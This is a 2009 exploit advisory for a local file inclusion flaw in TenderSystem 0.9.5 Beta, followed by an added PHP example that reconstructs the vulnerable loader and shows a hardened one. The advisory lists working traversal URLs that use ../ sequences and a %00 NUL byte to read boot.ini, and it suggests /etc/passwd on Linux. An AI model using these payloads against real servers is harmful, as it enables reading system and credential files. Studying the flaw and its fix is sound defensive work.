-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS
I was unable to get this to work on a Linux server. Further testing may be required.
------------------------------------------------------------------------------------------
Target: TenderSystem
Version: 0.9.5 Beta
Site: http://www.tendersystem.com/
Demo: http://demo.tendersystem.com/
Date: 2-14-2009
-------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.ssteam.ws
Contact: yaii_abc@hotmail.com
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
-------------------------------------------------------------------------------------------
Exploit (local file inclusion through the module and function parameters of main.php):

http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login
http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html
http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg

The ../ sequences walk up to the drive root, and the %00 (NUL byte) cuts the path off before
whatever suffix the application appends, so the trailing .html/.jpg makes no difference to
the result. This depends on PHP still honouring NUL bytes inside file paths (removed in PHP
5.3.4) and on magic_quotes_gpc not escaping the %00. boot.ini is a Windows file; a Linux
target would need a different file such as /etc/passwd.
-------------------------------------------------------------------------------------------------------
Vuln code in main.php (only the static require is quoted; the include that builds its path
from the module and function parameters is not shown here):

    // load required files
    require('modules/generic/ts_main.php');
    ?>
-------------------------------------------------------------------------------------------------------
Some things are better left unsaid <3 ... That is all.

/Packetdeath
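Added example, not TenderSystem's own code: the vulnerable loader below is an assumed reconstruction of the pattern the exploit URLs imply (module and function names concatenated into an include path), placed beside a hardened loader that allowlists the names and confines the resolved path to the modules/ directory. The module names in ALLOWED_MODULES, the modules/<module>/<function>.php layout and the PHP 7 syntax are assumptions.

```php
<?php
// Added example, not TenderSystem's code. Vulnerable loader = assumed
// reconstruction of what the exploit URLs imply; hardened loader = the fix.

// --- vulnerable: attacker controls the path, NUL byte strips the suffix ---
function load_module_vulnerable(string $module, string $function): void
{
    // module=../../../../../../../../boot.ini%00.html&function=login becomes
    // modules/../../../../../../../../boot.ini\0.html/login.php. On PHP < 5.3.4
    // the path is cut at \0, boot.ini is included, and since it contains no
    // <?php tags its text is echoed straight back to the client.
    $path = 'modules/' . $module . '/' . $function . '.php';
    include $path;
}

// --- hardened: allowlist plus path containment ---
const MODULE_ROOT     = __DIR__ . '/modules';
const ALLOWED_MODULES = ['generic', 'session'];   // assumed module names

function safe_name(string $value): string
{
    // Exactly one path segment of letters, digits or underscore.
    // Rejects '/', '\\', '.', NUL and anything over-long in one check.
    if (!preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $value)) {
        throw new InvalidArgumentException('bad name: ' . bin2hex($value));
    }
    return $value;
}

function load_module_safe(string $module, string $function): void
{
    $module   = safe_name($module);
    $function = safe_name($function);
    if (!in_array($module, ALLOWED_MODULES, true)) {
        throw new InvalidArgumentException('unknown module: ' . $module);
    }

    $root = realpath(MODULE_ROOT);
    $path = realpath(MODULE_ROOT . '/' . $module . '/' . $function . '.php');
    // realpath() resolves ../ and symlinks; anything that does not land
    // inside the modules/ tree (or does not exist) is refused.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('module file missing or outside modules/');
    }
    include $path;
}

// Dispatcher as a main.php might call it (parameter names taken from the URLs above).
try {
    load_module_safe($_GET['module'] ?? 'session', $_GET['function'] ?? 'login');
} catch (InvalidArgumentException | RuntimeException $e) {
    http_response_code(400);
    echo 'invalid request';   // never echo $e->getMessage() to the client
}
```

The regex alone already defeats every URL in this advisory (each contains '/' and '.'), but the allowlist and the realpath containment check are kept because they also hold on a PHP build that still truncates at NUL: a name that cannot contain a separator cannot leave the directory, and a resolved path that must start with the modules/ root cannot point at boot.ini.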